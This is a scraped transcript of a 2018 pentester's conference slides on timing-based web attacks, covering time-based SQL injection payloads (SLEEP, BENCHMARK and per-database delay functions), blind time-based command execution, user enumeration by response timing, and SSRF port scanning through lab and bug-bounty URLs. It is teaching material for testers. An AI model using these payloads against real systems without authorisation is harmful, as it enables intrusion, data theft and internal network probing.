timing-based attacks in web applications · 05/02/2018 · before : chemical engineer current :...
TRANSCRIPT
![Page 1: TIMING-BASED ATTACKS IN WEB APPLICATIONS · 05/02/2018 · Before : Chemical Engineer Current : Pentester @ Aura Information Security Hobbies : Backpacking, Watching Animes Member](https://reader035.vdocument.in/reader035/viewer/2022071210/602198c9c5ff2f60f87e217b/html5/thumbnails/1.jpg)
TIMING-BASED ATTACKS IN WEB APPLICATIONS
![Page 2: TIMING-BASED ATTACKS IN WEB APPLICATIONS · 05/02/2018 · Before : Chemical Engineer Current : Pentester @ Aura Information Security Hobbies : Backpacking, Watching Animes Member](https://reader035.vdocument.in/reader035/viewer/2022071210/602198c9c5ff2f60f87e217b/html5/thumbnails/2.jpg)
ABOUT ME
Ahmad Ashraff @Yappare
Before : Chemical Engineer
Current : Pentester
@ Aura Information Security
Hobbies : Backpacking, Watching Animes
Member Of OWASP MY Chapter, 2 nd in Bugcrowd
![Page 3: TIMING-BASED ATTACKS IN WEB APPLICATIONS · 05/02/2018 · Before : Chemical Engineer Current : Pentester @ Aura Information Security Hobbies : Backpacking, Watching Animes Member](https://reader035.vdocument.in/reader035/viewer/2022071210/602198c9c5ff2f60f87e217b/html5/thumbnails/3.jpg)
ABOUT THE PRESENTATION
• Not about how to be no.2 in Bugcrowd• Most of the content were already know – just a refresh• No trees or animals were harmed• No zero-day
![Page 4: TIMING-BASED ATTACKS IN WEB APPLICATIONS · 05/02/2018 · Before : Chemical Engineer Current : Pentester @ Aura Information Security Hobbies : Backpacking, Watching Animes Member](https://reader035.vdocument.in/reader035/viewer/2022071210/602198c9c5ff2f60f87e217b/html5/thumbnails/4.jpg)
WHAT IS IT?
Timing attack is a side channel attack which allows an attacker to retrieve potentially sensitive information from the web applications by observing the normal behavior of the response times.
tl;dr – vulnerabilities based on response times given by application.
![Page 5: TIMING-BASED ATTACKS IN WEB APPLICATIONS · 05/02/2018 · Before : Chemical Engineer Current : Pentester @ Aura Information Security Hobbies : Backpacking, Watching Animes Member](https://reader035.vdocument.in/reader035/viewer/2022071210/602198c9c5ff2f60f87e217b/html5/thumbnails/5.jpg)
IS IT NEW?
![Page 6: TIMING-BASED ATTACKS IN WEB APPLICATIONS · 05/02/2018 · Before : Chemical Engineer Current : Pentester @ Aura Information Security Hobbies : Backpacking, Watching Animes Member](https://reader035.vdocument.in/reader035/viewer/2022071210/602198c9c5ff2f60f87e217b/html5/thumbnails/6.jpg)
IS IT NEW?
![Page 7: TIMING-BASED ATTACKS IN WEB APPLICATIONS · 05/02/2018 · Before : Chemical Engineer Current : Pentester @ Aura Information Security Hobbies : Backpacking, Watching Animes Member](https://reader035.vdocument.in/reader035/viewer/2022071210/602198c9c5ff2f60f87e217b/html5/thumbnails/7.jpg)
SO, WHY WANT TO PRESENT IT?
• Hard to detect with automated web scanners a.k.a ”pentester’s good friend”• Modern websites and frameworks generally have built-in prevention for web attacks from user’s input. –
Blacklist method• No one has the ‘time’• ’young’ pentesters have no patience
![Page 8: TIMING-BASED ATTACKS IN WEB APPLICATIONS · 05/02/2018 · Before : Chemical Engineer Current : Pentester @ Aura Information Security Hobbies : Backpacking, Watching Animes Member](https://reader035.vdocument.in/reader035/viewer/2022071210/602198c9c5ff2f60f87e217b/html5/thumbnails/8.jpg)
SO, WHY WANT TO PRESENT IT?
• Importantly..
![Page 9: TIMING-BASED ATTACKS IN WEB APPLICATIONS · 05/02/2018 · Before : Chemical Engineer Current : Pentester @ Aura Information Security Hobbies : Backpacking, Watching Animes Member](https://reader035.vdocument.in/reader035/viewer/2022071210/602198c9c5ff2f60f87e217b/html5/thumbnails/9.jpg)
COMMON WEB VULNERABILITY WITH ‘TIME’ IN NAME
• Time based SQL Injection• Unsanitised input -> Injecting the time delay query to retrieve data• Blind• False positive from scanner
MySQL MSSQL Oracle PostgreSQL
SLEEP() WAITFOR DELAY BEGIN DBMS_LOCK.SLEEP()
pg_sleep()
BENCHMARK() WAITFOR TIME UTL_HTTP.REQUEST()
UTL_INADDR.get_host_address()
UTL_INADDR.get_host_name()
![Page 10: TIMING-BASED ATTACKS IN WEB APPLICATIONS · 05/02/2018 · Before : Chemical Engineer Current : Pentester @ Aura Information Security Hobbies : Backpacking, Watching Animes Member](https://reader035.vdocument.in/reader035/viewer/2022071210/602198c9c5ff2f60f87e217b/html5/thumbnails/10.jpg)
select 1 and sleep(1);
select 1 and sleep(2);
![Page 11: TIMING-BASED ATTACKS IN WEB APPLICATIONS · 05/02/2018 · Before : Chemical Engineer Current : Pentester @ Aura Information Security Hobbies : Backpacking, Watching Animes Member](https://reader035.vdocument.in/reader035/viewer/2022071210/602198c9c5ff2f60f87e217b/html5/thumbnails/11.jpg)
select BENCHMARK(1000000,MD5('A'));
select BENCHMARK(2000000,MD5('A'));
![Page 12: TIMING-BASED ATTACKS IN WEB APPLICATIONS · 05/02/2018 · Before : Chemical Engineer Current : Pentester @ Aura Information Security Hobbies : Backpacking, Watching Animes Member](https://reader035.vdocument.in/reader035/viewer/2022071210/602198c9c5ff2f60f87e217b/html5/thumbnails/12.jpg)
http://sqlmap.org/
![Page 13: TIMING-BASED ATTACKS IN WEB APPLICATIONS · 05/02/2018 · Before : Chemical Engineer Current : Pentester @ Aura Information Security Hobbies : Backpacking, Watching Animes Member](https://reader035.vdocument.in/reader035/viewer/2022071210/602198c9c5ff2f60f87e217b/html5/thumbnails/13.jpg)
![Page 14: TIMING-BASED ATTACKS IN WEB APPLICATIONS · 05/02/2018 · Before : Chemical Engineer Current : Pentester @ Aura Information Security Hobbies : Backpacking, Watching Animes Member](https://reader035.vdocument.in/reader035/viewer/2022071210/602198c9c5ff2f60f87e217b/html5/thumbnails/14.jpg)
COMMON WEB VULNERABILITY WITH ‘TIME’ IN NAME
• Remote code execution – blind/time based• IF statement + SLEEP command
![Page 15: TIMING-BASED ATTACKS IN WEB APPLICATIONS · 05/02/2018 · Before : Chemical Engineer Current : Pentester @ Aura Information Security Hobbies : Backpacking, Watching Animes Member](https://reader035.vdocument.in/reader035/viewer/2022071210/602198c9c5ff2f60f87e217b/html5/thumbnails/15.jpg)
time if [ statement ];then [ command ]; fi
![Page 16: TIMING-BASED ATTACKS IN WEB APPLICATIONS · 05/02/2018 · Before : Chemical Engineer Current : Pentester @ Aura Information Security Hobbies : Backpacking, Watching Animes Member](https://reader035.vdocument.in/reader035/viewer/2022071210/602198c9c5ff2f60f87e217b/html5/thumbnails/16.jpg)
time if [ statement ];then [ command ]; fi
![Page 17: TIMING-BASED ATTACKS IN WEB APPLICATIONS · 05/02/2018 · Before : Chemical Engineer Current : Pentester @ Aura Information Security Hobbies : Backpacking, Watching Animes Member](https://reader035.vdocument.in/reader035/viewer/2022071210/602198c9c5ff2f60f87e217b/html5/thumbnails/17.jpg)
https://github.com/dancezarp/TBDEx
ßVulnerable web
![Page 18: TIMING-BASED ATTACKS IN WEB APPLICATIONS · 05/02/2018 · Before : Chemical Engineer Current : Pentester @ Aura Information Security Hobbies : Backpacking, Watching Animes Member](https://reader035.vdocument.in/reader035/viewer/2022071210/602198c9c5ff2f60f87e217b/html5/thumbnails/18.jpg)
USER ENUMERATION
• https://www.owasp.org/index.php/Testing_for_User_Enumeration_and_Guessable_User_Account_(OWASP-AT-002)
• Use brute-force to either guess or confirm valid users in a system
• Login, registration, forgot password
• Easy but not common
• Low to medium risk
![Page 19: TIMING-BASED ATTACKS IN WEB APPLICATIONS · 05/02/2018 · Before : Chemical Engineer Current : Pentester @ Aura Information Security Hobbies : Backpacking, Watching Animes Member](https://reader035.vdocument.in/reader035/viewer/2022071210/602198c9c5ff2f60f87e217b/html5/thumbnails/19.jpg)
Basic access authentication
![Page 20: TIMING-BASED ATTACKS IN WEB APPLICATIONS · 05/02/2018 · Before : Chemical Engineer Current : Pentester @ Aura Information Security Hobbies : Backpacking, Watching Animes Member](https://reader035.vdocument.in/reader035/viewer/2022071210/602198c9c5ff2f60f87e217b/html5/thumbnails/20.jpg)
http://username:[email protected]/authentication/example2
curl-o/dev/null-s-w%{time_total}\\n An example of cURL command to get response times when requesting a URL
curl-o/dev/null-s-w%{time_total}\\n“http://username:[email protected]/authentication/example2”
![Page 21: TIMING-BASED ATTACKS IN WEB APPLICATIONS · 05/02/2018 · Before : Chemical Engineer Current : Pentester @ Aura Information Security Hobbies : Backpacking, Watching Animes Member](https://reader035.vdocument.in/reader035/viewer/2022071210/602198c9c5ff2f60f87e217b/html5/thumbnails/21.jpg)
![Page 22: TIMING-BASED ATTACKS IN WEB APPLICATIONS · 05/02/2018 · Before : Chemical Engineer Current : Pentester @ Aura Information Security Hobbies : Backpacking, Watching Animes Member](https://reader035.vdocument.in/reader035/viewer/2022071210/602198c9c5ff2f60f87e217b/html5/thumbnails/22.jpg)
![Page 23: TIMING-BASED ATTACKS IN WEB APPLICATIONS · 05/02/2018 · Before : Chemical Engineer Current : Pentester @ Aura Information Security Hobbies : Backpacking, Watching Animes Member](https://reader035.vdocument.in/reader035/viewer/2022071210/602198c9c5ff2f60f87e217b/html5/thumbnails/23.jpg)
USER ENUMERATION - PREVENTION
• Prevent bruteforce on sensitive forms
• Fix response times – make no differences
• Hashing
![Page 24: TIMING-BASED ATTACKS IN WEB APPLICATIONS · 05/02/2018 · Before : Chemical Engineer Current : Pentester @ Aura Information Security Hobbies : Backpacking, Watching Animes Member](https://reader035.vdocument.in/reader035/viewer/2022071210/602198c9c5ff2f60f87e217b/html5/thumbnails/24.jpg)
• Prevent bruteforce by limiting attempts. (https://www.drupal.org/node/1023440)
• No obvious time differ
• No bruteforce prevention
• No obvious time differ
• Can use other method for user enumeration
![Page 25: TIMING-BASED ATTACKS IN WEB APPLICATIONS · 05/02/2018 · Before : Chemical Engineer Current : Pentester @ Aura Information Security Hobbies : Backpacking, Watching Animes Member](https://reader035.vdocument.in/reader035/viewer/2022071210/602198c9c5ff2f60f87e217b/html5/thumbnails/25.jpg)
![Page 26: TIMING-BASED ATTACKS IN WEB APPLICATIONS · 05/02/2018 · Before : Chemical Engineer Current : Pentester @ Aura Information Security Hobbies : Backpacking, Watching Animes Member](https://reader035.vdocument.in/reader035/viewer/2022071210/602198c9c5ff2f60f87e217b/html5/thumbnails/26.jpg)
CROSS SITE PORT ATTACK (XSPA)SERVER SIDE REQUEST FORGERY (SSRF)
• https://www.owasp.org/index.php/Server_Side_Request_Forgery
• Abuse application/server functionality to read/update internal resource
• Abuse application/server functionality to port scan (XSPA)
![Page 27: TIMING-BASED ATTACKS IN WEB APPLICATIONS · 05/02/2018 · Before : Chemical Engineer Current : Pentester @ Aura Information Security Hobbies : Backpacking, Watching Animes Member](https://reader035.vdocument.in/reader035/viewer/2022071210/602198c9c5ff2f60f87e217b/html5/thumbnails/27.jpg)
Web application via Internet
Intranet
![Page 28: TIMING-BASED ATTACKS IN WEB APPLICATIONS · 05/02/2018 · Before : Chemical Engineer Current : Pentester @ Aura Information Security Hobbies : Backpacking, Watching Animes Member](https://reader035.vdocument.in/reader035/viewer/2022071210/602198c9c5ff2f60f87e217b/html5/thumbnails/28.jpg)
http://testingserver/bWAPP/rlfi.php?language=http://localhost:22&action=goprotocol
Targeted IPService port
How SSRF usually looks like.
![Page 29: TIMING-BASED ATTACKS IN WEB APPLICATIONS · 05/02/2018 · Before : Chemical Engineer Current : Pentester @ Aura Information Security Hobbies : Backpacking, Watching Animes Member](https://reader035.vdocument.in/reader035/viewer/2022071210/602198c9c5ff2f60f87e217b/html5/thumbnails/29.jpg)
Web application via Internet
Intranet
Internal PC192.168.0.25
attacker
bWAPP
![Page 30: TIMING-BASED ATTACKS IN WEB APPLICATIONS · 05/02/2018 · Before : Chemical Engineer Current : Pentester @ Aura Information Security Hobbies : Backpacking, Watching Animes Member](https://reader035.vdocument.in/reader035/viewer/2022071210/602198c9c5ff2f60f87e217b/html5/thumbnails/30.jpg)
attackerInternal PC192.168.0.25
Can’t reach directly
![Page 31: TIMING-BASED ATTACKS IN WEB APPLICATIONS · 05/02/2018 · Before : Chemical Engineer Current : Pentester @ Aura Information Security Hobbies : Backpacking, Watching Animes Member](https://reader035.vdocument.in/reader035/viewer/2022071210/602198c9c5ff2f60f87e217b/html5/thumbnails/31.jpg)
From the vulnerable SSRF, the application gives long response on http://192.168.0.25
http://testingserver/bWAPP/rlfi.php?language=http://192.168.0.25&action=go
![Page 32: TIMING-BASED ATTACKS IN WEB APPLICATIONS · 05/02/2018 · Before : Chemical Engineer Current : Pentester @ Aura Information Security Hobbies : Backpacking, Watching Animes Member](https://reader035.vdocument.in/reader035/viewer/2022071210/602198c9c5ff2f60f87e217b/html5/thumbnails/32.jpg)
http://testingserver/bWAPP/rlfi.php?language=http://192.168.0.25:port&action=go
![Page 33: TIMING-BASED ATTACKS IN WEB APPLICATIONS · 05/02/2018 · Before : Chemical Engineer Current : Pentester @ Aura Information Security Hobbies : Backpacking, Watching Animes Member](https://reader035.vdocument.in/reader035/viewer/2022071210/602198c9c5ff2f60f87e217b/html5/thumbnails/33.jpg)
Timing based attacks in bug bounty
![Page 34: TIMING-BASED ATTACKS IN WEB APPLICATIONS · 05/02/2018 · Before : Chemical Engineer Current : Pentester @ Aura Information Security Hobbies : Backpacking, Watching Animes Member](https://reader035.vdocument.in/reader035/viewer/2022071210/602198c9c5ff2f60f87e217b/html5/thumbnails/34.jpg)
SQL Injection and RCE
![Page 35: TIMING-BASED ATTACKS IN WEB APPLICATIONS · 05/02/2018 · Before : Chemical Engineer Current : Pentester @ Aura Information Security Hobbies : Backpacking, Watching Animes Member](https://reader035.vdocument.in/reader035/viewer/2022071210/602198c9c5ff2f60f87e217b/html5/thumbnails/35.jpg)
Username Enumeration
![Page 36: TIMING-BASED ATTACKS IN WEB APPLICATIONS · 05/02/2018 · Before : Chemical Engineer Current : Pentester @ Aura Information Security Hobbies : Backpacking, Watching Animes Member](https://reader035.vdocument.in/reader035/viewer/2022071210/602198c9c5ff2f60f87e217b/html5/thumbnails/36.jpg)
SSRF/XSPA
![Page 37: TIMING-BASED ATTACKS IN WEB APPLICATIONS · 05/02/2018 · Before : Chemical Engineer Current : Pentester @ Aura Information Security Hobbies : Backpacking, Watching Animes Member](https://reader035.vdocument.in/reader035/viewer/2022071210/602198c9c5ff2f60f87e217b/html5/thumbnails/37.jpg)
{ "ImageUrls": [ "http://jd0s36c0nizcxbs2z7nfk7svtmzcn1.burpcollaborator.net" ]}
![Page 38: TIMING-BASED ATTACKS IN WEB APPLICATIONS · 05/02/2018 · Before : Chemical Engineer Current : Pentester @ Aura Information Security Hobbies : Backpacking, Watching Animes Member](https://reader035.vdocument.in/reader035/viewer/2022071210/602198c9c5ff2f60f87e217b/html5/thumbnails/38.jpg)
{ "ImageUrls": [ "http://localhost:<port>" ]}
![Page 39: TIMING-BASED ATTACKS IN WEB APPLICATIONS · 05/02/2018 · Before : Chemical Engineer Current : Pentester @ Aura Information Security Hobbies : Backpacking, Watching Animes Member](https://reader035.vdocument.in/reader035/viewer/2022071210/602198c9c5ff2f60f87e217b/html5/thumbnails/39.jpg)
{ "ImageUrls": [ "http://localhost:<port>" ]}
![Page 40: TIMING-BASED ATTACKS IN WEB APPLICATIONS · 05/02/2018 · Before : Chemical Engineer Current : Pentester @ Aura Information Security Hobbies : Backpacking, Watching Animes Member](https://reader035.vdocument.in/reader035/viewer/2022071210/602198c9c5ff2f60f87e217b/html5/thumbnails/40.jpg)
![Page 41: TIMING-BASED ATTACKS IN WEB APPLICATIONS · 05/02/2018 · Before : Chemical Engineer Current : Pentester @ Aura Information Security Hobbies : Backpacking, Watching Animes Member](https://reader035.vdocument.in/reader035/viewer/2022071210/602198c9c5ff2f60f87e217b/html5/thumbnails/41.jpg)
NOTES
• Do not miss to test timing based attacks in your testing
• Careful in performing the attack as it could impact server’s performance -DOS
• Delayed response does not confirm there’s a vulnerability, further test and observation is required
![Page 42: TIMING-BASED ATTACKS IN WEB APPLICATIONS · 05/02/2018 · Before : Chemical Engineer Current : Pentester @ Aura Information Security Hobbies : Backpacking, Watching Animes Member](https://reader035.vdocument.in/reader035/viewer/2022071210/602198c9c5ff2f60f87e217b/html5/thumbnails/42.jpg)
REFERENCES
• https://owasp.org
• https://codeseekah.com/2012/04/29/timing-attacks-in-web-applications/
• https://ibreak.software/2013/04/xspa-ssrf-vulnerability-with-the-adobe-omniture-web-application/
• https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/